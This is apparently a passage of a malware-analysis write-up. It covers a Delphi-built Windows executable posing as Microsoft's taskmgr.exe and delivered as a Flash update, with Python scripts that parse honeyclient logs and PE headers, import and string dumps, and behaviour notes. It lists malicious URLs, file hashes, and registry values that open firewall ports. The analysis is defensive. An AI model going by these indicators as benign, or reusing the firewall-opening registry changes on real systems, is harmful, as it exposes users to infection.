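[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
"""

HTTP_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[HTTP\] URL: (?P<url>\S+) \((?P<fields>.*)\)$")
REDIR_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[HREF Redirection \((?P<kind>[^)]+)\)\] "
                      r"Content-Location: (?P<src>\S+) --> Location: (?P<dst>\S+)$")
FIELD_RE = re.compile(r"([\w-]+): ([^,]+)")


def parse_log(text):
    """Return (requests, edges): per-URL facts and parent->child edges in log order."""
    requests, edges = {}, []
    for line in text.splitlines():
        m = HTTP_RE.match(line)
        if m:
            url = m.group("url")
            rec = requests.setdefault(url, {"status": set(), "md5": set(), "referrer": set(), "ctype": set()})
            for key, val in FIELD_RE.findall(m.group("fields")):
                key = key.lower()
                if key == "status":
                    rec["status"].add(int(val))
                elif key == "md5":
                    rec["md5"].add(val.lower())
                elif key == "content-type":
                    rec["ctype"].add(val)
                elif key == "referrer" and val != "None":
                    rec["referrer"].add(val)
                    edges.append((val, url, "referrer"))
            continue
        m = REDIR_RE.match(line)
        if m:
            edges.append((m.group("src"), m.group("dst"), m.group("kind")))
        # any other line (e.g. the [MongoDB] notice) is ignored
    return requests, edges


def redirect_chain(requests, edges):
    """Breadth-first walk from the root, i.e. the URL that was fetched with no referrer."""
    queue = [u for u, r in requests.items() if not r["referrer"]]
    order, seen = [], set()
    while queue:
        u = queue.pop(0)
        if u in seen:
            continue
        seen.add(u)
        order.append(u)
        queue.extend(child for parent, child, _ in edges if parent == u)
    return order


def extract_iocs(requests):
    hosts = {urlsplit(u).hostname for u in requests}
    md5s = set().union(*(r["md5"] for r in requests.values()))
    return {"urls": sorted(requests), "hosts": sorted(hosts), "md5s": sorted(md5s)}


def gated_responses(requests, edges):
    """Redirect targets that answered 4xx to the honeyclient (possible header gating)."""
    targets = {child for _, child, reason in edges if reason != "referrer"}
    return sorted(u for u in targets
                  if any(400 <= s < 500 for s in requests.get(u, {"status": ()})["status"]))


if __name__ == "__main__":
    reqs, edges = parse_log(SAMPLE_LOG)
    print("chain:", " -> ".join(redirect_chain(reqs, edges)))
    print("iocs:", extract_iocs(reqs))
    print("gated:", gated_responses(reqs, edges))
```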
-----------------------------
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
Bin:
//Pic:
// faking windoz app:
UninitializedDataSize....: 0
InitializedDataSize......: 23040
ImageVersion.............: 0.0
ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
FileVersionNumber........: 5.0.2137.1
LanguageCode.............: English (U.S.)
FileFlagsMask............: 0x003f
FileDescription..........: Windows TaskManager
CharacterSet.............: Unicode
LinkerVersion............: 2.5
FileOS...................: Windows NT 32-bit
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 5.00.2137.1
TimeStamp................: 2012:10:17 04:29:46+01:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............: taskmgr
ProductVersion...........: 5.00.2137.1
SubsystemVersion.........: 4.0
OSVersion................: 4.0
OriginalFilename.........: taskmgr.exe
LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............: Microsoft Corporation
CodeSize.................: 108032
FileSubtype..............: 0
ProductVersionNumber.....: 5.0.2137.1
EntryPoint...............: 0x1ef0
ObjectFileType...........: Executable application
//Sigcheck
publisher................: Microsoft Corporation
product..................: Microsoft(R) Windows (R) 2000 Operating System
internal name............: taskmgr
copyright................: Copyright (C) Microsoft Corp. 1991-1999
original name............: taskmgr.exe
file version.............: 5.00.2137.1
description..............: Windows TaskManager
.text 4096 107728 108032 7.49 7bb7c23fbff31a0f4dc8c2082f47d453
.data 114688 13048 12800 1.62 bfd92f96b4b275e9bdc8941a0ac85831
.rsrc 131072 8368 8704 3.36 210a8ec34d58b64a2531c59aa8344586
.reloc 143360 516 1024 3.94 1841b4a61bd8a2498e642d7a36c6d596
Compiled by: Borland Delphi 3.0
Compile Time: 2012-10-17 12:29:46
Packed entropy: Entropy 7.48782313568
Name: .text
Misc: 0x1A4D0
Misc_PhysicalAddress: 0x1A4D0
Misc_VirtualSize: 0x1A4D0
VirtualAddress: 0x1000
SizeOfRawData: 0x1A600
PointerToRawData: 0x400
PointerToRelocations: 0x0
PointerToLinenumbers: 0x0
NumberOfRelocations: 0x0
NumberOfLinenumbers: 0x0
Characteristics: 0x60000020
LangID: 040904B0
LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
InternalName: taskmgr
FileVersion: 5.00.2137.1
CompanyName: Microsoft Corporation
ProductName: Microsoft(R) Windows (R) 2000 Operating System
ProductVersion: 5.00.2137.1
FileDescription: Windows TaskManager
OriginalFilename: taskmgr.exe
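// Added example (my code, not output of the tools used above): parse the MZ/PE header from the 0xA0 bytes dumped on this page, recover the link timestamp from the COFF header (it decodes to 2012-10-17 03:29:46 UTC, which is the 04:29:46+01:00 shown by exiftool above), compute Shannon entropy the way the "Packed entropy" line does, and run three plain heuristics over the version resource that claims to be Microsoft's taskmgr.exe. The version-resource values and the "Borland Delphi 3.0" compiler string are copied from the page; the heuristics themselves are mine and are hints, not verdicts.

```python
"""Parse the dumped PE header and cross-check it against the claimed version resource."""
import math
import re
import struct
from datetime import datetime, timezone

# Sample input: the first 0xA0 bytes of update_flash_player.exe as dumped on this page.
HEXDUMP = """\
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
"""

# Version resource fields as reported on this page for the same sample.
VERSION_INFO = {
    "CompanyName": "Microsoft Corporation",
    "LegalCopyright": "Copyright (C) Microsoft Corp. 1991-1999",
    "OriginalFilename": "taskmgr.exe",
}
COMPILER = "Borland Delphi 3.0"


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from 'offset 16-hex-bytes ascii' lines; offsets must be contiguous."""
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if len(fields) < 17:
            continue
        if int(fields[0], 16) != len(out):
            raise ValueError("hex dump offsets are not contiguous")
        out += bytes(int(h, 16) for h in fields[1:17])
    return bytes(out)


def parse_pe_header(data):
    """Read the DOS stub pointer, COFF header and the start of the optional header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, tstamp, _symtab, _nsyms, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    magic, linker_major, linker_minor, size_of_code = struct.unpack_from(
        "<HBBI", data, e_lfanew + 24)
    return {
        "e_lfanew": e_lfanew, "machine": machine, "sections": nsections,
        "timestamp_utc": datetime.fromtimestamp(tstamp, tz=timezone.utc),
        "characteristics": chars, "opt_magic": magic,
        "linker": (linker_major, linker_minor), "size_of_code": size_of_code,
    }


def shannon_entropy(blob):
    """Bits per byte, 0.0 for constant data and 8.0 for uniformly distributed bytes."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def masquerade_findings(hdr, version_info, compiler, delivered_name):
    """Cheap consistency checks between what the resource claims and what the file is."""
    findings = []
    if "Microsoft" in version_info.get("CompanyName", "") and not compiler.lower().startswith("microsoft"):
        findings.append(f"CompanyName claims Microsoft but the binary was built with {compiler}")
    years = [int(y) for y in re.findall(r"\d{4}", version_info.get("LegalCopyright", ""))]
    if years and hdr["timestamp_utc"].year > max(years):
        findings.append(f"link time {hdr['timestamp_utc']:%Y-%m-%d} is after the copyright years {min(years)}-{max(years)}")
    if delivered_name.lower() != version_info.get("OriginalFilename", "").lower():
        findings.append(f"delivered as {delivered_name} but OriginalFilename says {version_info.get('OriginalFilename')}")
    return findings


if __name__ == "__main__":
    data = hexdump_to_bytes(HEXDUMP)
    hdr = parse_pe_header(data)
    print(hdr)
    print("entropy of the dumped header bytes: %.2f" % shannon_entropy(data))
    for f in masquerade_findings(hdr, VERSION_INFO, COMPILER, "update_flash_player.exe"):
        print("-", f)
```

SizeOfCode comes back as 108032, the same figure the CodeSize line and the .text section table above report, which is a quick way to confirm the dump and the section listing describe the same file.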
------------------
imported calls DLL
-------------------
0041EA0C GetCPInfo KERNEL32
0041EA10 VirtualAlloc KERNEL32
0041EA14 LoadLibraryA KERNEL32
0041EA18 GetProcAddress KERNEL32
0041EA1C GetWindowsDirectoryW KERNEL32
0041EA20 lstrcatW KERNEL32
0041EA24 CreateFileW KERNEL32
0041EA2C LoadIconA USER32
0041EA30 CreateIconIndirect USER32
0041EA34 GetDlgCtrlID USER32
0041EA38 GetScrollPos USER32
0041EA3C RegisterDeviceNotificationA USER32
0041EA40 DdeEnableCallback USER32
0041EA44 DrawStateA USER32
0041EA48 MessageBoxIndirectW USER32
0041EA4C LoadMenuA USER32
0041EA50 GetTabbedTextExtentA USER32
0041EA54 UnpackDDElParam USER32
0041EA58 DialogBoxIndirectParamW USER32
0041EA5C ToAsciiEx USER32
0041EA60 IsWindow USER32
0041EA64 LoadKeyboardLayoutA USER32
0041EA68 GetCursor USER32
0041EA6C UserHandleGrantAccess USER32
0041EA70 GetMenuState USER32
0041EA74 SetMenuItemInfoA USER32
0041EA78 TabbedTextOutW USER32
0041EA7C mouse_event USER32
0041EA80 DdeSetUserHandle USER32
0041EA84 SetWindowWord USER32
0041EA88 SetDlgItemTextW USER32
0041EA8C IsMenu USER32
0041EA90 SetWindowTextW USER32
0041EA94 GetSystemMenu USER32
0041EA98 RegisterClassA USER32
0041EA9C ChangeDisplaySettingsExW USER32
0041EAA0 SetMenuInfo USER32
0041EAA4 GetKeyState USER32
0041EAA8 ChildWindowFromPoint USER32
0041EAAC LoadCursorFromFileW USER32
0041EAB0 SendMessageCallbackA USER32
0041EAB4 DdeKeepStringHandle USER32
0041EAB8 FlashWindow USER32
0041EABC OpenIcon USER32
0041EAC0 CreateMenu USER32
0041EAC4 FindWindowW USER32
0041EAC8 GetIconInfo USER32
0041EACC GetWindowInfo USER32
0041EAD0 IsCharAlphaNumericA USER32
0041EAD4 FrameRect USER32
0041EAD8 FlashWindowEx USER32
0041EADC SetSysColors USER32
0041EAE0 GetCapture USER32
0041EAE4 DdeGetLastError USER32
0041EAE8 SetWindowsHookA USER32
0041EAEC PostThreadMessageA USER32
0041EAF0 TranslateMessage USER32
0041EAF4 GetDlgItemTextA USER32
0041EAF8 GetShellWindow USER32
0041EAFC CreateAcceleratorTableW USER32
0041EB00 DrawMenuBar USER32
0041EB04 DdeDisconnect USER32
0041EB08 SetClipboardData USER32
0041EB0C CreateDialogParamW USER32
0041EB10 ToUnicodeEx USER32
0041EB14 CreatePopupMenu USER32
0041EB18 IMPQueryIMEA USER32
0041EB1C CloseWindowStation USER32
0041EB20 GetGuiResources USER32
0041EB24 GetPropW USER32
0041EB28 SetActiveWindow USER32
0041EB2C CharNextExA USER32
0041EB30 IsRectEmpty USER32
0041EB34 LockSetForegroundWindow USER32
0041EB38 SetScrollRange USER32
0041EB3C EnumPropsExW USER32
0041EB40 PostMessageA USER32
0041EB44 GetClassInfoExW USER32
0041EB48 UpdateWindow USER32
0041EB4C GetFocus USER32
0041EB50 GetWindow USER32
0041EB54 PaintDesktop USER32
0041EB58 GetKeyboardLayout USER32
0041EB5C ChangeMenuA USER32
0041EB60 GetThreadDesktop USER32
0041EB64 CharLowerBuffW USER32
0041EB6C RegOpenKeyExW ADVAPI32
--------------
stringzzz
--------------
.text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
.data:0041C02C 0000000C C CreateFileW
.data:0041C038 00000009 C kernel32
.data:0041EB76 0000000A C GetCPInfo
.data:0041EB82 0000000D C VirtualAlloc
.data:0041EB92 0000000D C LoadLibraryA
.data:0041EBA2 0000000F C GetProcAddress
.data:0041EBB4 00000015 C GetWindowsDirectoryW
.data:0041EBCC 00000009 C lstrcatW
.data:0041EBD8 0000000C C CreateFileW
.data:0041EBE4 0000000D C KERNEL32.dll
.data:0041EBF4 0000000A C LoadIconA
.data:0041EC00 00000013 C CreateIconIndirect
.data:0041EC16 0000000D C GetDlgCtrlID
.data:0041EC26 0000000D C GetScrollPos
.data:0041EC36 0000001C C RegisterDeviceNotificationA
.data:0041EC54 00000012 C DdeEnableCallback
.data:0041EC68 0000000B C DrawStateA
.data:0041EC76 00000014 C MessageBoxIndirectW
.data:0041EC8C 0000000A C LoadMenuA
.data:0041EC98 00000015 C GetTabbedTextExtentA
.data:0041ECB0 00000010 C UnpackDDElParam
.data:0041ECC2 00000018 C DialogBoxIndirectParamW
.data:0041ECDC 0000000A C ToAsciiEx
.data:0041ECE8 00000009 C IsWindow
.data:0041ECF4 00000014 C LoadKeyboardLayoutA
.data:0041ED0A 0000000A C GetCursor
.data:0041ED16 00000016 C UserHandleGrantAccess
.data:0041ED2E 0000000D C GetMenuState
.data:0041ED3E 00000011 C SetMenuItemInfoA
.data:0041ED52 0000000F C TabbedTextOutW
.data:0041ED64 0000000C C mouse_event
.data:0041ED72 00000011 C DdeSetUserHandle
.data:0041ED86 0000000E C SetWindowWord
.data:0041ED96 00000010 C SetDlgItemTextW
.data:0041EDA8 00000007 C IsMenu
.data:0041EDB2 0000000F C SetWindowTextW
.data:0041EDC4 0000000E C GetSystemMenu
.data:0041EDD4 0000000F C RegisterClassA
.data:0041EDE6 00000019 C ChangeDisplaySettingsExW
.data:0041EE02 0000000C C SetMenuInfo
.data:0041EE10 0000000C C GetKeyState
.data:0041EE1E 00000015 C ChildWindowFromPoint
.data:0041EE36 00000014 C LoadCursorFromFileW
.data:0041EE4C 00000015 C SendMessageCallbackA
.data:0041EE64 00000014 C DdeKeepStringHandle
.data:0041EE7A 0000000C C FlashWindow
.data:0041EE88 00000009 C OpenIcon
.data:0041EE94 0000000B C CreateMenu
.data:0041EEA2 0000000C C FindWindowW
.data:0041EEB0 0000000C C GetIconInfo
.data:0041EEBE 0000000E C GetWindowInfo
.data:0041EECE 00000014 C IsCharAlphaNumericA
.data:0041EEE4 0000000A C FrameRect
.data:0041EEF0 0000000E C FlashWindowEx
.data:0041EF00 0000000D C SetSysColors
.data:0041EF10 0000000B C GetCapture
.data:0041EF1E 00000010 C DdeGetLastError
.data:0041EF30 00000010 C SetWindowsHookA
.data:0041EF42 00000013 C PostThreadMessageA
.data:0041EF58 00000011 C TranslateMessage
.data:0041EF6C 00000010 C GetDlgItemTextA
.data:0041EF7E 0000000F C GetShellWindow
.data:0041EF90 00000018 C CreateAcceleratorTableW
.data:0041EFAA 0000000C C DrawMenuBar
.data:0041EFB8 0000000E C DdeDisconnect
.data:0041EFC8 00000011 C SetClipboardData
.data:0041EFDC 00000013 C CreateDialogParamW
.data:0041EFF2 0000000C C ToUnicodeEx
.data:0041F000 00000010 C CreatePopupMenu
.data:0041F012 0000000D C IMPQueryIMEA
.data:0041F022 00000013 C CloseWindowStation
.data:0041F038 00000010 C GetGuiResources
.data:0041F04A 00000009 C GetPropW
.data:0041F056 00000010 C SetActiveWindow
.data:0041F068 0000000C C CharNextExA
.data:0041F076 0000000C C IsRectEmpty
.data:0041F084 00000018 C LockSetForegroundWindow
.data:0041F09E 0000000F C SetScrollRange
.data:0041F0B0 0000000D C EnumPropsExW
.data:0041F0C0 0000000D C PostMessageA
.data:0041F0D0 00000010 C GetClassInfoExW
.data:0041F0E2 0000000D C UpdateWindow
.data:0041F0F2 00000009 C GetFocus
.data:0041F0FE 0000000A C GetWindow
.data:0041F10A 0000000D C PaintDesktop
.data:0041F11A 00000012 C GetKeyboardLayout
.data:0041F12E 0000000C C ChangeMenuA
.data:0041F13C 00000011 C GetThreadDesktop
.data:0041F150 0000000F C CharLowerBuffW
.data:0041F160 0000000B C USER32.dll
.data:0041F16E 0000000E C RegOpenKeyExW
.data:0041F17C 0000000D C ADVAPI32.dll
.rsrc:00420004 00000005 C *&~P
.rsrc:0042002C 00000005 C *&~P
.rsrc:004200BC 00000005 C *&~P
.rsrc:004200E4 00000005 C *&~P
.rsrc:0042010C 00000005 C *&~P
.rsrc:00420134 00000005 C *&~P
.rsrc:0042015C 00000005 C *&~P
.rsrc:00420184 00000005 C *&~P
.rsrc:004201AC 00000005 C *&~P
.rsrc:004201D4 00000005 C *&~P
.rsrc:004201FC 00000005 C *&~P
.rsrc:00420224 00000005 C *&~P
.rsrc:0042024C 00000005 C *&~P
.rsrc:00420274 00000005 C *&~P
.rsrc:0042029C 00000005 C *&~P
.rsrc:004202C4 00000005 C *&~P
.rsrc:004202EC 00000005 C *&~P
.rsrc:00420314 00000005 C *&~P
.rsrc:0042033C 00000005 C *&~P
.rsrc:004203BC 00000005 C *&~P
.rsrc:004203E4 00000005 C *&~P
.rsrc:0042040C 00000005 C *&~P
.rsrc:00420434 00000005 C *&~P
.rsrc:0042045C 00000005 C *&~P
.rsrc:00420484 00000005 C *&~P
.rsrc:004204AC 00000005 C *&~P
.rsrc:004204D4 00000005 C *&~P
.rsrc:004204FC 00000005 C *&~P
.rsrc:00420524 00000005 C *&~P
.rsrc:0042054C 00000005 C *&~P
.rsrc:00420574 00000005 C *&~P
.rsrc:0042059C 00000005 C *&~P
.rsrc:004205C4 00000005 C *&~P
.rsrc:004205EC 00000005 C *&~P
.rsrc:00420604 00000005 C *&~P
.rsrc:004207D9 0000000D C wwwwwwwwwwwwx
.rsrc:004207E9 0000000D C wwwwwwwwwwwwx
.rsrc:004207F9 0000000D C w\"wwwwwwwxwwx
.rsrc:0042080B 00000006 C wwwwp
.rsrc:00420819 00000007 C wwwwwwx
.rsrc:00420829 0000000D C wwwwwwwwwwwwx
.rsrc:0042087B 0000000A C wwwwwwwwwx
.rsrc:0042096B 0000000A C wwwwwwwwwx
.rsrc:0042098A 0000000A C \bwwwwwwwww
.rsrc:0042099C 00000009 C wwpwwwwww
.rsrc:00420AD1 0000000E C wwwwwwwwwwwwww
.rsrc:00420C11 0000000E C wwwwwwwwwwwwww
.rsrc:00420C21 0000000B C DDDDDDDDD@
.rsrc:00420C31 0000000E C DDDDDDDDDGpw\ap
.rsrc:00420C41 0000000E C DDDDDDDDDGpw\ap
.rsrc:00420C51 0000000E C DDDDDDDDDDDDDD
.rsrc:00420C61 0000000E C wwwwwwwwwwwwww
.rsrc:00420DE9 00000006 C DDDDDD
.rsrc:00420DF1 00000006 C wwwwww
.rsrc:00420ECA 00000006 C /
.rsrc:00420ED2 00000006 C \"\"\"\"/
.rsrc:00420EDA 00000006 C /
.rsrc:00420EE2 00000006 C \"\"\"\"/
.rsrc:00420EEA 00000006 C /
.rsrc:00420EF2 00000006 C \"\"\"\"/
.rsrc:00420EFA 00000006 C /
.rsrc:00420F02 00000006 C \"\"\"\"/
.rsrc:00420F0A 00000006 C /
.rsrc:00420F12 00000006 C \"\"\"\"/
.rsrc:00420F1A 00000006 C /
.rsrc:00420FFA 00000006 C \"\"\"\"/
.rsrc:00421002 00000006 C /
.rsrc:0042100A 00000006 C \"\"\"\"/
.rsrc:00421012 00000006 C /
.rsrc:0042101A 00000006 C \"\"\"\"/
.rsrc:00421022 00000006 C /
.rsrc:0042102A 00000006 C \"\"\"\"/
.rsrc:00421032 00000006 C /
.rsrc:0042103A 00000006 C \"\"\"\"/
.rsrc:00421042 00000006 C /
.rsrc:0042112A 00000006 C /
.rsrc:00421132 00000006 C \"\"\"\"/
.rsrc:0042113A 00000006 C /
.rsrc:00421142 00000006 C \"\"\"\"/
.rsrc:0042114A 00000006 C /
.rsrc:00421152 00000006 C \"\"\"\"/
.rsrc:0042115A 00000006 C /
.rsrc:00421162 00000006 C \"\"\"\"/
.rsrc:0042116A 00000006 C /
.rsrc:0042125A 00000006 C \"\"\"\"/
.rsrc:00421262 00000006 C /
.rsrc:0042126A 00000006 C \"\"\"\"/
.rsrc:00421272 00000006 C /
.rsrc:0042127A 00000006 C \"\"\"\"/
.rsrc:00421282 00000006 C /
.rsrc:0042128A 00000006 C \"\"\"\"/
.rsrc:00421292 00000006 C /
.rsrc:0042138A 00000006 C /
.rsrc:00421392 00000006 C \"\"\"\"/
.rsrc:0042139A 00000006 C /
.rsrc:004213A2 00000006 C \"\"\"\"/
.rsrc:004213AA 00000006 C /
.rsrc:004213B2 00000006 C \"\"\"\"/
.rsrc:004213BA 00000006 C /
.rsrc:004214BA 00000006 C \"\"\"\"/
.rsrc:004214C2 00000006 C /
.rsrc:004214CA 00000006 C \"\"\"\"/
.rsrc:004214D2 00000006 C /
.rsrc:004214DA 00000006 C \"\"\"\"/
.rsrc:004214E2 00000006 C /
.rsrc:004215EA 00000006 C /
.rsrc:004215F2 00000006 C \"\"\"\"/
.rsrc:004215FA 00000006 C /
.rsrc:00421602 00000006 C \"\"\"\"/
.rsrc:0042160A 00000006 C /
.rsrc:0042171A 00000006 C \"\"\"\"/
.rsrc:00421722 00000006 C /
.rsrc:0042172A 00000006 C \"\"\"\"/
.rsrc:00421732 00000006 C /
.rsrc:0042184A 00000006 C /
.rsrc:00421852 00000006 C \"\"\"\"/
.rsrc:0042185A 00000006 C /
.rsrc:0042197A 00000006 C \"\"\"\"/
.rsrc:00421982 00000006 C /
.rsrc:00421AAA 00000006 C /
=====================
behavior check:
=====================
Self-deleting.
Drops 1154656.exe as its payload (a copy of itself) and uses a CMD command to execute itself.
See pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
REGISTRY:
----------------------------------
Keys added:26
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
----------------------------------
Values added:112
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
